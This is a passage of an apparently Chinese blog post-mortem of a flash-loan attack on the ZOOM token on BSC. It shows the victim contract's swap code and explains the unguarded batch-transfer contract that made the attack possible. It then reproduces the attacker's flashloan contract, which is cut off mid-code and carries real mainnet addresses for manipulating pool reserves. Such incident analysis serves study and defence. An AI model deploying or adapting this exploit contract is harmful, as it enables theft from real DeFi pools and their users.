_trueAmount;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">rpSixAward</span>(<span class="params">address _user, uint256 _amount</span>) internal returns (uint256)&#123;</span><br><span class="line">        uint256 orw = <span class="number">0</span>;        <span class="comment">//累计已发出金额</span></span><br><span class="line">        address cua = _user;    <span class="comment">//当前用户，要轮啊轮，不要就完犊子了</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">//开始轮训奖励，吃吃吃吃吃吃饱业务</span></span><br><span class="line">        <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; sixGenRate.<span class="property">length</span>; i++) &#123;</span><br><span class="line">            address _fa = <span class="variable constant_">RP</span>.<span class="title function_">father</span>(cua);</span><br><span class="line"></span><br><span class="line">            <span class="comment">//两种情况：一种是没有绑定上线，另一种是有上线但没有六级，断档了真特么见鬼</span></span><br><span class="line">            <span class="keyword">if</span> (_fa == <span class="title function_">address</span>(<span class="number">0</span>)) &#123;</span><br><span class="line">                <span class="comment">//处理方式都一样的，总的应发层级奖励-已发层级奖励。没有上线就是全吃吃吃吃吃，断档了就吃渣渣</span></span><br><span class="line">                uint256 defaultAll = ((_amount * sixGenSumRate / <span class="number">100000</span>) - orw);</span><br><span class="line">                <span class="title class_">IERC20</span>(anti).<span class="title function_">transfer</span>(defaultAdd, defaultAll);</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="comment">//余下就是有上线的杂鱼，按业务分层处理，只有一个注意点，真特么手续费扩大过10倍，只处理0.X的费率，还说写死鬼</span></span><br><span class="line">            uint256 _rw = (_amount * sixGenRate[i] / <span class="number">100000</span>);</span><br><span class="line">            <span class="title class_">IERC20</span>(anti).<span class="title function_">transfer</span>(_fa, _rw);</span><br><span class="line"></span><br><span class="line">            <span class="comment">//累计发放过的金额，给孤儿或断档做计算数据。更替地址，给他老家伙轮训</span></span><br><span class="line">            cua = _fa;</span><br><span class="line">            orw += _rw;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> orw;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ******************************************************</span></span><br><span class="line">    <span class="comment">//真u到token</span></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">buy</span>(<span class="params">uint256 _amount</span>) public &#123;</span><br><span class="line">        <span class="title class_">IERC20</span>(usdtZhen).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amount);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//开始得到token</span></span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">3</span>);</span><br><span class="line">        path[<span class="number">0</span>] = usdtZhen;</span><br><span class="line">        path[<span class="number">1</span>] = usdtJia;</span><br><span class="line">        path[<span class="number">2</span>] = anti;</span><br><span class="line">        uint256[] memory amountSwap = router02.<span class="title function_">swapExactTokensForTokens</span>(_amount, <span class="number">0</span>, path, <span class="title function_">address</span>(<span class="variable language_">this</span>), block.<span class="property">timestamp</span>);</span><br><span class="line"></span><br><span class="line">        uint256 bf = amountSwap[amountSwap.<span class="property">length</span> - <span class="number">1</span>];<span class="comment">//查询token余额</span></span><br><span class="line">        uint256 bk = <span class="title function_">rpSixAwardPub</span>(bf, msg.<span class="property">sender</span>);<span class="comment">//开始六层分润</span></span><br><span class="line">        <span class="title class_">IERC20</span>(anti).<span class="title function_">transfer</span>(msg.<span class="property">sender</span>, bk);<span class="comment">//按刨除分润后的金额，系数打给用户</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">sell</span>(<span class="params">uint256 _amount</span>) public &#123;</span><br><span class="line">        <span class="title class_">IERC20</span>(anti).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amount);</span><br><span class="line"></span><br><span class="line">        _amount = <span class="title function_">rpSixAwardPub</span>(_amount, msg.<span class="property">sender</span>);<span class="comment">//修改金额，变成六层分润过后的金额</span></span><br><span class="line"></span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">3</span>);</span><br><span class="line">        path[<span class="number">0</span>] = anti;</span><br><span class="line">        path[<span class="number">1</span>] = usdtJia;</span><br><span class="line">        path[<span class="number">2</span>] = usdtZhen;</span><br><span class="line">        router02.<span class="title function_">swapExactTokensForTokens</span>(_amount, <span class="number">0</span>, path, msg.<span class="property">sender</span>, block.<span class="property">timestamp</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ******************************************************</span></span><br><span class="line">    <span class="comment">//假u到token</span></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">buy2</span>(<span class="params">uint256 _amount</span>) public &#123;</span><br><span class="line">        <span class="built_in">require</span>(writeList[msg.<span class="property">sender</span>],<span class="string">&quot;no swap role&quot;</span>);</span><br><span class="line">        <span class="title class_">IERC20</span>(usdtJia).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amount);</span><br><span class="line"></span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">2</span>);</span><br><span class="line">        path[<span class="number">0</span>] = usdtJia;</span><br><span class="line">        path[<span class="number">1</span>] = anti;</span><br><span class="line"></span><br><span class="line">        uint256[] memory amountSwap = router02.<span class="title function_">swapExactTokensForTokens</span>(_amount, <span class="number">0</span>, path, <span class="title function_">address</span>(<span class="variable language_">this</span>), block.<span class="property">timestamp</span>);</span><br><span class="line"></span><br><span class="line">        uint256 bf = amountSwap[amountSwap.<span class="property">length</span> - <span class="number">1</span>];<span class="comment">//查询token余额</span></span><br><span class="line">        uint256 bk = <span class="title function_">rpSixAwardPub</span>(bf, <span class="title function_">address</span>(<span class="number">0</span>));<span class="comment">//开始六层分润</span></span><br><span class="line">        <span class="title class_">IERC20</span>(anti).<span class="title function_">transfer</span>(msg.<span class="property">sender</span>, bk);<span class="comment">//按刨除分润后的金额，系数打给用户</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">sell2</span>(<span class="params">uint256 _amount</span>) public &#123;</span><br><span class="line">        <span class="built_in">require</span>(writeList[msg.<span class="property">sender</span>],<span class="string">&quot;no swap role&quot;</span>);</span><br><span class="line">        <span class="title class_">IERC20</span>(anti).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amount);</span><br><span class="line"></span><br><span class="line">        _amount = <span class="title function_">rpSixAwardPub</span>(_amount,  <span class="title function_">address</span>(<span class="number">0</span>));<span class="comment">//修改金额，变成六层分润过后的金额</span></span><br><span class="line"></span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">2</span>);</span><br><span class="line">        path[<span class="number">0</span>] = anti;</span><br><span class="line">        path[<span class="number">1</span>] = usdtJia;</span><br><span class="line"></span><br><span class="line">        router02.<span class="title function_">swapExactTokensForTokens</span>(_amount, <span class="number">0</span>, path, msg.<span class="property">sender</span>, block.<span class="property">timestamp</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ******************************************************</span></span><br><span class="line">    <span class="comment">//真u到假u</span></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">buy3</span>(<span class="params">uint256 _amount</span>) public &#123;</span><br><span class="line">        <span class="built_in">require</span>(writeList[msg.<span class="property">sender</span>],<span class="string">&quot;no swap role&quot;</span>);</span><br><span class="line">        <span class="title class_">IERC20</span>(usdtZhen).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amount);</span><br><span class="line"></span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">2</span>);</span><br><span class="line">        path[<span class="number">0</span>] = usdtZhen;</span><br><span class="line">        path[<span class="number">1</span>] = usdtJia;</span><br><span class="line"></span><br><span class="line">        uint256[] memory amountSwap = router02.<span class="title function_">swapExactTokensForTokens</span>(_amount, <span class="number">0</span>, path, msg.<span class="property">sender</span>, block.<span class="property">timestamp</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">sell3</span>(<span class="params">uint256 _amount</span>) public &#123;</span><br><span class="line">        <span class="built_in">require</span>(writeList[msg.<span class="property">sender</span>],<span class="string">&quot;no swap role&quot;</span>);</span><br><span class="line">        <span class="title class_">IERC20</span>(usdtJia).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amount);</span><br><span class="line"></span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">2</span>);</span><br><span class="line">        path[<span class="number">0</span>] = usdtJia;</span><br><span class="line">        path[<span class="number">1</span>] = usdtZhen;</span><br><span class="line"></span><br><span class="line">        router02.<span class="title function_">swapExactTokensForTokens</span>(_amount, <span class="number">0</span>, path, msg.<span class="property">sender</span>, block.<span class="property">timestamp</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ******************************************************</span></span><br><span class="line">    <span class="comment">//真u到假u，内部调用。区别是：这个是转账到指定用户，上面那个是转账给调用人</span></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">buy3</span>(<span class="params">uint256 _amount, address _user</span>) internal &#123;</span><br><span class="line">        <span class="title class_">IERC20</span>(usdtZhen).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amount);</span><br><span class="line"></span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">2</span>);</span><br><span class="line">        path[<span class="number">0</span>] = usdtZhen;</span><br><span class="line">        path[<span class="number">1</span>] = usdtJia;</span><br><span class="line"></span><br><span class="line">        router02.<span class="title function_">swapExactTokensForTokens</span>(_amount, <span class="number">0</span>, path, _user, block.<span class="property">timestamp</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">sell3</span>(<span class="params">uint256 _amount, address _user</span>) internal &#123;</span><br><span class="line">        <span class="title class_">IERC20</span>(usdtJia).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amount);</span><br><span class="line"></span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">2</span>);</span><br><span class="line">        path[<span class="number">0</span>] = usdtJia;</span><br><span class="line">        path[<span class="number">1</span>] = usdtZhen;</span><br><span class="line"></span><br><span class="line">        router02.<span class="title function_">swapExactTokensForTokens</span>(_amount, <span class="number">0</span>, path, _user, block.<span class="property">timestamp</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ******************************************************</span></span><br><span class="line">    <span class="comment">// 流动性管理- 真u到token</span></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">addL</span>(<span class="params">uint256 _amountADesired, uint256 _amountBDesired</span>) public &#123;</span><br><span class="line">        <span class="comment">//把用户的真u搞成假u，就当时收用户假u</span></span><br><span class="line">        <span class="title function_">buy3</span>(_amountADesired, <span class="title function_">address</span>(<span class="variable language_">this</span>));</span><br><span class="line">        <span class="title class_">IERC20</span>(anti).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amountBDesired);</span><br><span class="line"></span><br><span class="line">        router02.<span class="title function_">addLiquidity</span>(usdtJia, anti, <span class="title class_">IERC20</span>(usdtJia).<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(<span class="variable language_">this</span>)), _amountBDesired, <span class="number">0</span>, <span class="number">0</span>, msg.<span class="property">sender</span>, block.<span class="property">timestamp</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">remL</span>(<span class="params">uint256 _liquidity</span>) public &#123;</span><br><span class="line">        <span class="comment">//上一步：用户得到lp实际是：假u和token组合的lp。所以解除的话就是：得到假u和token</span></span><br><span class="line">        <span class="title class_">IERC20</span>(pair).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _liquidity);</span><br><span class="line">        router02.<span class="title function_">removeLiquidity</span>(usdtJia, anti, _liquidity, <span class="number">0</span>, <span class="number">0</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), block.<span class="property">timestamp</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//然后把假u兑换真u</span></span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">2</span>);</span><br><span class="line">        path[<span class="number">0</span>] = usdtJia;</span><br><span class="line">        path[<span class="number">1</span>] = usdtZhen;</span><br><span class="line">        router02.<span class="title function_">swapExactTokensForTokens</span>(<span class="title class_">IERC20</span>(usdtJia).<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(<span class="variable language_">this</span>)), <span class="number">0</span>, path, <span class="title function_">address</span>(<span class="variable language_">this</span>), block.<span class="property">timestamp</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//都给用户</span></span><br><span class="line">        <span class="title class_">IERC20</span>(usdtZhen).<span class="title function_">transfer</span>(msg.<span class="property">sender</span>, <span class="title class_">IERC20</span>(usdtZhen).<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(<span class="variable language_">this</span>)));</span><br><span class="line">        <span class="title class_">IERC20</span>(anti).<span class="title function_">transfer</span>(msg.<span class="property">sender</span>, <span class="title class_">IERC20</span>(anti).<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(<span class="variable language_">this</span>)));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 流动性管理- token到假u。上面是把用户的真u搞成假u，然后添加了池子2的流动性。这一步是手里面直接有假u了，直接添加池子2流动性。以增加池子2假u和token的交易量(实际上是真u和token交易量)</span></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">addL2</span>(<span class="params">uint256 _amountADesired, uint256 _amountBDesired</span>) public &#123;</span><br><span class="line">        <span class="title class_">IERC20</span>(usdtJia).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amountADesired);</span><br><span class="line">        <span class="title class_">IERC20</span>(anti).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amountBDesired);</span><br><span class="line">        router02.<span class="title function_">addLiquidity</span>(usdtJia, anti, _amountADesired, _amountBDesired, <span class="number">0</span>, <span class="number">0</span>, msg.<span class="property">sender</span>, block.<span class="property">timestamp</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">remL2</span>(<span class="params">uint256 _liquidity</span>) public &#123;</span><br><span class="line">        <span class="title class_">IERC20</span>(pair).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _liquidity);</span><br><span class="line">        router02.<span class="title function_">removeLiquidity</span>(usdtJia, anti, _liquidity, <span class="number">0</span>, <span class="number">0</span>, msg.<span class="property">sender</span>, block.<span class="property">timestamp</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 流动性管理- 真u到假u。这里是添加池子1的流动性，这里是给用户提供转换的</span></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">addL3</span>(<span class="params">uint256 _amountADesired, uint256 _amountBDesired</span>) public &#123;</span><br><span class="line">        <span class="title class_">IERC20</span>(usdtZhen).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amountADesired);</span><br><span class="line">        <span class="title class_">IERC20</span>(usdtJia).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _amountBDesired);</span><br><span class="line">        router02.<span class="title function_">addLiquidity</span>(usdtZhen, usdtJia, _amountADesired, _amountBDesired, <span class="number">0</span>, <span class="number">0</span>, msg.<span class="property">sender</span>, block.<span class="property">timestamp</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">remL3</span>(<span class="params">uint256 _liquidity</span>) public &#123;</span><br><span class="line">        <span class="title class_">IERC20</span>(pair2).<span class="title function_">transferFrom</span>(msg.<span class="property">sender</span>, <span class="title function_">address</span>(<span class="variable language_">this</span>), _liquidity);</span><br><span class="line">        router02.<span class="title function_">removeLiquidity</span>(usdtJia, usdtZhen, _liquidity, <span class="number">0</span>, <span class="number">0</span>, msg.<span class="property">sender</span>, block.<span class="property">timestamp</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ****************************************************** 询价</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">getPrice</span>(<span class="params">address _token, uint256 _amount</span>) public view returns (uint256)&#123;</span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">3</span>);</span><br><span class="line">        <span class="keyword">if</span> (_token == usdtZhen) &#123;</span><br><span class="line">            path[<span class="number">0</span>] = usdtZhen;</span><br><span class="line">            path[<span class="number">1</span>] = usdtJia;</span><br><span class="line">            path[<span class="number">2</span>] = anti;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            path[<span class="number">0</span>] = anti;</span><br><span class="line">            path[<span class="number">1</span>] = usdtJia;</span><br><span class="line">            path[<span class="number">2</span>] = usdtZhen;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> router02.<span class="title function_">getAmountsOut</span>(_amount, path)[<span class="number">2</span>];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">getPrice2</span>(<span class="params">address _token, uint256 _amount</span>) public view returns (uint256)&#123;</span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">2</span>);</span><br><span class="line">        <span class="keyword">if</span> (_token == usdtJia) &#123;</span><br><span class="line">            path[<span class="number">0</span>] = usdtJia;</span><br><span class="line">            path[<span class="number">1</span>] = anti;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            path[<span class="number">0</span>] = anti;</span><br><span class="line">            path[<span class="number">1</span>] = usdtJia;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> router02.<span class="title function_">getAmountsOut</span>(_amount, path)[<span class="number">1</span>];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">getPrice3</span>(<span class="params">address _token, uint256 _amount</span>) public view returns (uint256)&#123;</span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">2</span>);</span><br><span class="line">        <span class="keyword">if</span> (_token == usdtZhen) &#123;</span><br><span class="line">            path[<span class="number">0</span>] = usdtZhen;</span><br><span class="line">            path[<span class="number">1</span>] = usdtJia;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            path[<span class="number">0</span>] = usdtJia;</span><br><span class="line">            path[<span class="number">1</span>] = usdtZhen;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> router02.<span class="title function_">getAmountsOut</span>(_amount, path)[<span class="number">1</span>];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ****************************************************** 普通币币，查询lp</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">getLp</span>(<span class="params">address fa, address tokenA, address tokenB</span>) public view returns (address pair)&#123;<span class="keyword">return</span> <span class="title class_">IusdtZhen</span>(fa).<span class="title function_">getPair</span>(tokenA, tokenB);&#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">withdrawToken</span>(<span class="params">address token, address to, uint value</span>) public onlyOwner returns (bool)&#123;</span><br><span class="line">        (bool success, bytes memory data) = <span class="title function_">address</span>(token).<span class="title function_">call</span>(abi.<span class="title function_">encodeWithSelector</span>(<span class="number">0xa9059cbb</span>, to, value));</span><br><span class="line">        <span class="built_in">require</span>(success, <span class="title function_">string</span>(abi.<span class="title function_">encodePacked</span>(<span class="string">&quot;fail code 14&quot;</span>, data)));</span><br><span class="line">        <span class="keyword">return</span> success;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>逻辑大概是 用户用真u买币-&gt;真u换成假u-&gt;假u换币 实际上项目方有两个池子 一个是真u和假u 的池子 一个是假u和币的池子</p>
<h4 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h4><p>项目方为了方便空投发币方便创建了一个批量发币合约，但是不知道为啥项目方往这个合约里打了100w的假u，这个合约是不开源的，但是没有权限控制，任何人都可以调用，猜测攻击者从项目方的地址交易记录中发现里这个合约。</p>
<p><img src="/img/postimg/zoom/image-20220908231145210.png" alt="image-20220908231145210"></p>
<h4 id="攻击流程"><a href="#攻击流程" class="headerlink" title="攻击流程"></a>攻击流程</h4><p>攻击者从pancake池子中闪电贷了300w usdt ，然后调用受害合约的buy方法 买入大量代币，此时攻击者手里有大量代币，随后攻击者调用批量转账合约里的方法将合约里的100w 假u转入pair 合约中，在调用pair合约的sync方法，强制更新了pair合约的储备量，此时币价会拉升，相当于给攻击者手里的筹码拉盘了，最后攻击者砸盘，最终获利$6.1w。</p>
<h3 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h3><h4 id="攻击合约"><a href="#攻击合约" class="headerlink" title="攻击合约"></a>攻击合约</h4><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> *Submitted for verification at BscScan.com on 2022-03-16</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line">pragma solidity = <span class="number">0.8</span><span class="number">.6</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">interface <span class="title class_">IERC20</span> &#123;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">balanceOf</span>(<span class="params">address account</span>) external view returns (uint256);</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">transfer</span>(<span class="params">address recipient, uint256 amount</span>) external returns (bool);</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">approve</span>(<span class="params">address spender, uint256 amount</span>) external returns (bool);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">interface <span class="title class_">IPancakeCallee</span> &#123;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">pancakeCall</span>(<span class="params">address sender, uint amount0, uint amount1, bytes calldata data</span>) external;</span><br><span class="line">&#125;</span><br><span class="line">interface <span class="title class_">IPancakePair</span> &#123;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">swap</span>(<span class="params">uint amount0Out, uint amount1Out, address to, bytes calldata data</span>) external;</span><br><span class="line">&#125;</span><br><span class="line">interface <span class="variable constant_">IUSD</span> &#123;</span><br><span class="line">  <span class="keyword">function</span> <span class="title function_">batchToken</span>(<span class="params">address[] calldata _addr, uint256[]calldata _num, address token</span>)external ;</span><br><span class="line">  <span class="keyword">function</span> <span class="title function_">swapTokensForExactTokens</span>(<span class="params"></span></span><br><span class="line"><span class="params">        uint amountIn,</span></span><br><span class="line"><span class="params">        uint amountOutMin,</span></span><br><span class="line"><span class="params">        address[] calldata path,</span></span><br><span class="line"><span class="params">        address to,</span></span><br><span class="line"><span class="params">        uint deadline</span></span><br><span class="line"><span class="params">    </span>) external returns (uint[] memory amounts) ;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">buy</span>(<span class="params">uint256</span>) external ;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">sell</span>(<span class="params">uint256</span>)external ;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">getReserves</span>(<span class="params"></span>) external  view returns (uint112 _reserve0, uint112 _reserve1, uint32 _blockTimestampLast);</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">sync</span> ()external ;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">contract flashloan is <span class="title class_">IPancakeCallee</span>&#123;</span><br><span class="line">    address private bnb = <span class="number">0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c</span>;</span><br><span class="line">    address private  router = <span class="number">0x10ED43C718714eb63d5aA57B78B54704E256024E</span>;</span><br><span class="line">    address private usdt = <span class="number">0x55d398326f99059fF775485246999027B3197955</span>;</span><br><span class="line">    address private swap = <span class="number">0x5a9846062524631C01ec11684539623DAb1Fae58</span>;</span><br><span class="line">    <span class="title class_">IERC20</span> <span class="title class_">Usdt</span> =<span class="title class_">IERC20</span> (usdt);</span><br><span class="line">    address private  zoom = <span class="number">0x9CE084C378B3E65A164aeba12015ef3881E0F853</span>;</span><br><span class="line">    address private batch = <span class="number">0x47391071824569F29381DFEaf2f1b47A4004933B</span>;</span><br><span class="line">    address private fU = <span class="number">0x62D51AACb079e882b1cb7877438de485Cba0dD3f</span>;</span><br><span class="line">    address private pp = <span class="number">0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5</span>;</span><br><span class="line">    <span class="title class_">IERC20</span> <span class="title class_">Zoom</span> =<span class="title class_">IERC20</span> (zoom);</span><br><span class="line">    <span class="title class_">IPancakePair</span> <span class="variable constant_">LP</span>= <span class="title class_">IPancakePair</span>(<span class="number">0x7EFaEf62fDdCCa950418312c6C91Aef321375A00</span>);</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">loan</span>(<span class="params">uint256 amount</span>) public payable&#123;</span><br><span class="line">            <span class="built_in">require</span>(msg.<span class="property">sender</span> ==<span class="number">0xc578d755cd56255d3ff6e92e1b6371ba945e3984</span>, <span class="string">&quot;fuck u&quot;</span>);</span><br><span class="line">        <span class="variable constant_">LP</span>.<span class="title function_">swap</span>(amount,<span class="number">0</span>,<span class="title function_">address</span>(<span class="variable language_">this</span>),<span class="keyword">new</span> <span class="title function_">bytes</span>(<span class="number">1</span>));<span class="comment">//vay tiền</span></span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">   </span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">pancakeCall</span>(<span class="params">address sender, uint amount0, uint amount1, bytes calldata data</span>) override external</span><br><span class="line">    &#123;</span><br><span class="line">        uint256 ba = <span class="title class_">Usdt</span>.<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(<span class="variable language_">this</span>));</span><br><span class="line">        <span class="title class_">Usdt</span>.<span class="title function_">approve</span>(swap,<span class="number">100000000000000000000000000000000000000</span>);</span><br><span class="line">        address[] memory path = <span class="keyword">new</span> address[](<span class="number">2</span>);</span><br><span class="line">        path[<span class="number">0</span>] = usdt;</span><br><span class="line">        path[<span class="number">1</span>] =swap;</span><br><span class="line">        <span class="title function_">IUSD</span>(swap).<span class="title function_">buy</span>(ba);</span><br><span class="line">        address[] memory n1 = <span class="keyword">new</span> address[](<span class="number">1</span>);</span><br><span class="line">        n1[<span class="number">0</span>] = pp;</span><br><span class="line">        uint256[] memory n2 = <span class="keyword">new</span> uint256[](<span class="number">1</span>);</span><br><span class="line">        n2[<span class="number">0</span>] = <span class="number">1000000</span> ether;</span><br><span class="line">        <span class="title function_">IUSD</span>(batch).<span class="title function_">batchToken</span>(n1,n2,fU);</span><br><span class="line">        <span class="title function_">IUSD</span>(pp).<span class="title function_">sync</span>();</span><br><span class="line">        uint256 baz = <span class="title class_">Zoom</span>.<span class="title function_">balanceOf</span>(<span class="title function_">address</span>(<span class="variable language_">this</span>));</span><br><span class="line">        <span 